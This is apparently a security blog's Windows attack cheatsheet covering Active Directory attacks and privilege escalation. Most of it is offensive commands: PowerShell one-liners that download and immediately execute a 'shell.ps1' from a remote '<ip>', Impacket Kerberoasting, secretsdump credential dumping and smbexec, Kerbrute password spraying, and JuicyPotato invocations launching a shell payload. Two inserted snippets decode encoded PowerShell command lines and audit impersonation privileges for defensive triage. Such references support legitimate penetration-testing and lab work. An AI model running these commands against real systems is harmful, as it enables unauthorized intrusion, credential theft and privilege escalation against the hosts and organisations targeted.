Rethink Security

Windows Cheatsheet

security cheats tools windows powershell AD privesc



So this is the Windows equivalent of my post about Linux cheatsheets. A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error, and also copied from well-known places like HackTricks and ired.team.

I also have grepable cheatsheets to download on my GitHub.

Powershell

Download from remote Webserver

PS> Invoke-WebRequest -Uri "http://<ip>:<port>/shell.ps1" -OutFile "C:\path\file"

The following commands download a file; the IEX variant executes it immediately (IEX is the alias for Invoke-Expression):

PS> IEX (New-Object Net.WebClient).DownloadString('http://<ip>:<port>/shell.ps1')
PS> powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://<ip>/wget.exe','C:\Users\Joe\Desktop\wget.exe')"
PS> wget "http://<ip>:<port>/shell.ps1"

Convert commands to base64 in Kali Linux

$ echo -n "Powershell command" | iconv --to-code UTF-16LE | base64 -w 0
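The same encoding step as a reusable helper, plus the reverse direction: as an added example (not part of the original post), a POSIX shell snippet that encodes a command the way the one-liner above does (UTF-16LE, then base64) and decodes the -EncodedCommand argument back out of a command line, which is what you do when triaging such a process-creation log entry. The command line is constructed for the example; it assumes only iconv, coreutils base64 and a sed that supports -E.

```shell
#!/bin/sh
# Added example, not from the original post: encode a PowerShell command as the
# one-liner above does (UTF-16LE, then base64) and decode such a value back out
# of a process command line, e.g. when triaging a process-creation log entry.

# Encode: -EncodedCommand expects base64 over the UTF-16LE bytes of the text.
ps_encode() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 -w 0
}

# Decode the reverse way (base64, then UTF-16LE back to UTF-8).
ps_decode() {
    printf '%s' "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8
}

# Extract the -e / -enc / -EncodedCommand argument (case-insensitive, the usual
# spellings) from a full command line and decode it. Returns 1 when the command
# line carries no encoded command, so callers can tell the two cases apart.
ps_decode_cmdline() {
    enc=$(printf '%s' "$1" | sed -n -E \
        's#.*-[Ee]([Nn][Cc]([Oo][Dd][Ee][Dd][Cc][Oo][Mm][Mm][Aa][Nn][Dd])?)?[[:space:]]+([A-Za-z0-9+/=]+).*#\3#p')
    [ -n "$enc" ] || return 1
    ps_decode "$enc"
}

# Constructed sample (not a real log entry): a command line as it would appear
# in a process-creation event. The encoded payload is just "Get-Process".
SAMPLE_CMDLINE='powershell.exe -nop -w hidden -enc RwBlAHQALQBQAHIAbwBjAGUAcwBzAA=='

echo "encoded: $(ps_encode 'Get-Process')"
echo "decoded: $(ps_decode_cmdline "$SAMPLE_CMDLINE")"
```

ps_decode_cmdline deliberately does not match every flag that starts with -e (for instance -ExecutionPolicy is skipped because no whitespace follows the prefix), so a command line without an encoded command yields no output and a non-zero status rather than base64-decoding an unrelated argument.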

Search for files and/or passwords

PS> Get-ChildItem -Hidden -Recurse \path\

Domain

Attacking domains requires a lot of tools. On a Linux machine (Kali and/or Parrot) the Impacket toolset[1] is essential.

Impacket-GetUserSPNs

$ impacket-GetUserSPNs -request "bigcorp.com/alice":"Password123" -dc-ip <ip>

Impacket-SecretsDump

$ impacket-secretsdump bigcorp.com/Alice:Password123@<ip>

Impacket-smbexec

$ /usr/bin/impacket-smbexec bigcorp.com/joe:Password123@<ip>

Ldapdomaindump[2]

$ ldapdomaindump -u "BIGCORP\alice" -p "Password123" <ip>

Kerbrute[3]

Example with password spraying

$ ./kerbrute_linux_amd64 passwordspray users.txt "Password123" -d bigcorp.com --dc <ip>

SMB

To mount shares, first open a local SMB share with impacket-smbserver:

$ impacket-smbserver "Sharename" <path>

Then mount the SMB share on the remote Windows machine:

PS> New-PSDrive -Name <name> -PSProvider "FileSystem" -Root "\\<ip>\Sharename"

Transfer data with copy (source or destination can also be a network path):

copy <Source> <Destination>

JuicyPotato

To escalate privileges with JuicyPotato[4] the following token privileges are needed:

  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege

These can be checked with:

whoami /priv
whoami /all
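As an added example (not part of the original post), a POSIX shell snippet that reads a saved "whoami /priv" listing and reports the state of the two privileges named above. The listing below is constructed for the example, with the CRLF line endings a Windows console produces; the same parser is what you would run over listings collected from service accounts when reviewing which of them hold impersonation rights. It assumes only awk and tr.

```shell
#!/bin/sh
# Added example, not from the original post: check a saved "whoami /priv"
# listing for the two privileges named above. Useful when reviewing which
# accounts hold impersonation rights, not only when running the tool by hand.

# Constructed sample output of "whoami /priv" (not captured from a real host),
# with the CRLF line endings a Windows console produces.
SAMPLE_PRIV=$(printf 'PRIVILEGES INFORMATION\r\n----------------------\r\n\r\nPrivilege Name                Description                               State\r\n============================= ========================================= ========\r\nSeChangeNotifyPrivilege       Bypass traverse checking                  Enabled\r\nSeImpersonatePrivilege        Impersonate a client after authentication Enabled\r\nSeIncreaseWorkingSetPrivilege Increase a process working set            Disabled\r\n')

# priv_state LISTING NAME: print the State column for NAME ("Enabled" or
# "Disabled"), or nothing when the privilege is not held at all.
priv_state() {
    printf '%s\n' "$1" | tr -d '\r' | awk -v p="$2" '$1 == p { print $NF }'
}

# has_priv LISTING NAME: succeed only when NAME is listed as Enabled.
# A privilege that is listed but Disabled is still held by the token and can
# be enabled by the process itself, so a hardening review should flag both.
has_priv() {
    [ "$(priv_state "$1" "$2")" = "Enabled" ]
}

# impersonation_privs LISTING: print each of the two privileges from the list
# above with its state, and succeed if at least one of them is held.
impersonation_privs() {
    found=1
    for p in SeImpersonatePrivilege SeAssignPrimaryTokenPrivilege; do
        s=$(priv_state "$1" "$p")
        printf '%s: %s\n' "$p" "${s:-not held}"
        [ -n "$s" ] && found=0
    done
    return $found
}

impersonation_privs "$SAMPLE_PRIV"
```

To use it on a real listing, redirect "whoami /priv" to a file on the Windows host and pass its contents in place of SAMPLE_PRIV; the CR stripping keeps the awk field matching from failing on the last column.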

Also check whether the host system is x86 or x64 based, so that the correct JuicyPotato build is downloaded.

Execute the command (important: the program passed with -p cannot be quoted, which means a program with arguments such as nc.exe cannot be used; use a standalone shell.exe instead):

PS> Juicy.Potato.x86.exe -l 9028 -c {4991d34b-80a1-4291-83b6-3328366b9097} -p shell.exe -t *
PS> JuicyPotato -l 1338 -p shell.exe -t *

The original exploit does not seem to need the -c option, but the x86 derivative does.

PrivEsc via exploit

For Windows exploits it is recommended to always google the versions in use together with the intention (i.e. "Privilege Escalation", "Exploit", "0day"). This can turn up additional GitHub repos that are not available via searchsploit or the exploit suggester.[5]

Furthermore, check the target server for other interesting hints; for example, if Python is installed on Windows, potential exploits written in Python can be used.


  1. https://github.com/SecureAuthCorp/impacket

  2. https://github.com/dirkjanm/ldapdomaindump

  3. https://github.com/ropnop/kerbrute

  4. https://github.com/ohpe/juicy-potato

  5. https://github.com/AonCyberLabs/Windows-Exploit-Suggester